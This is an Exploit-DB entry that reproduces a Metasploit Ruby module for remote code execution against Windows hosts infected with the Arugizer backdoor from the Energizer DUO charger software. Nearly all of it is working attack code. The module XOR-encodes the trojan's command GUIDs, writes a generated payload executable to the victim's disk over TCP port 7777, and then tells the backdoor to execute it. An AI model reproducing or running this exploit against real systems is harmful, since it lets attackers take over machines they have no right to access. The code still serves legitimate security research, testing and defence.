Arugizer Trojan Horse (Energizer DUO) - Code Execution (Metasploit)

EDB-ID:

16390




Platform:

Windows

Date:

2010-09-20


##
# $Id: energizer_duo_payload.rb 10389 2010-09-20 04:38:13Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::EXE

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Energizer DUO Trojan Code Execution',
			'Description'    => %q{
					This module will execute an arbitrary payload against
				any system infected with the Arugizer trojan horse. This
				backdoor was shipped with the software package accompanying
				the Energizer Duo USB battery charger.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10389 $',
			'References'     =>
				[
					['CVE', '2010-0103'],
					['OSVDB', '62782'],
					['US-CERT-VU', '154421']
				],
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Mar 05 2010'
			))


		register_options(
			[
				Opt::RPORT(7777),
			], self.class)
	end

	def trojan_encode(str)
		str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")
	end

	def trojan_command(cmd)
		cid = ""

		case cmd
		when :exec
			cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"
		when :dir
			cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"
		when :write
			cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"
		when :read
			cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"
		when :nop
			cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"
		when :find
			cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"
		when :yes
			cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"
		when :runonce
			cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"
		when :delete
			cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
		end

		trojan_encode(
			[cid.length + 1].pack("V") + cid  + "\x00"
		)
	end

	def exploit

		nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"
		exe = generate_payload_exe + "\x00"


		print_status("Trying to upload #{nam}...")
		connect

		# Write file request
		sock.put(trojan_command(:write))
		sock.put(trojan_encode([nam.length].pack("V")))
		sock.put(trojan_encode(nam))
		sock.put(trojan_encode([exe.length].pack("V")))
		sock.put(trojan_encode(exe))

		# Required to prevent the server from spinning a loop
		sock.put(trojan_command(:nop))

		disconnect

		#
		# Execute the payload
		#

		print_status("Trying to execute #{nam}...")

		connect

		# Execute file request
		sock.put(trojan_command(:exec))
		sock.put(trojan_encode([nam.length].pack("V")))
		sock.put(trojan_encode(nam))

		# Required to prevent the server from spinning a loop
		sock.put(trojan_command(:nop))

		disconnect
	end
end